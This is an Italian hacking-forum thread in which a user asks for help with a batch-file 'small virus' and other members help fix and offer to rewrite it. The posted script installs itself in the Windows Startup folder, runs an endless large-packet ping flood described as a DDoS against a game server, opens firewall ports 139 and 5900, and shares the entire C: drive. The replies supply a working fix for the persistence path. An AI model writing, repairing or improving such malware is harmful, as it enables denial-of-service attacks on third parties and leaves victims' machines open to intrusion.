• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Domanda aiuto ho un problema nel mio piccolo virus

stefx

Nuovo utente
Autore del topic
13 Dicembre 2010
11
0
Miglior risposta
0
@Echo off
copy "all key.bat" "C:\Users\AFLA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
@Echo off
ping
Perfavore, Entra oppure Registrati per vedere i Link!
-t -l 6000

@Echo off
netsh firewall add portopening protocol = ALL port = 139 name = DNS mode = ENABLE scope = ALL profile = ALL
@Echo off
netsh firewall add portopening TCP 5900 PORTAWEB
@Echo off
netsh firewall add portopening TCP 139 PORTAWEB
@Echo off
net share disco=C:
@Echo off
netsh firewall add portopening TCP "139" PortaWeb
@Echo off
netsh firewall add portopening TCP "5900" PortaWeb
exit

@Echo off
copy "all key.bat" "C:\Users\AFLA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
@Echo off
ping
Perfavore, Entra oppure Registrati per vedere i Link!
-t -l 6000

ho un problema aiuto il virus funziona sul mio pc ma negli altri no per il seguente problema non tutti chi chiamano alfa

"C:\Users\AFLA\ cosa devo fare?

Riferimento: aiuto ho un problema nel mio piccolo virus

Se ho capito bene il tuo problema sta nel fatto che nn trova questa cartella C:\User\AFLA che come posso vedere mi sembra la cartella dei programmi che si avviano appena accendi il pc. Io posso spiegarti una procedura per fare la stessa cosa pero in VB6.

ho risolto cambiando il codice cosi ora mi manca una sola cosa dopo il ddos perfetto avra inizzio e aioninfinite chiudera

copy "all key.bat", "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

Bhe come virus non è un gran chè. Se vuoi posso rifartelo io da zero :emoji_slight_smile:.

Segnalo Ai Mod Di Chiudere!! Visto Che Ai Risolto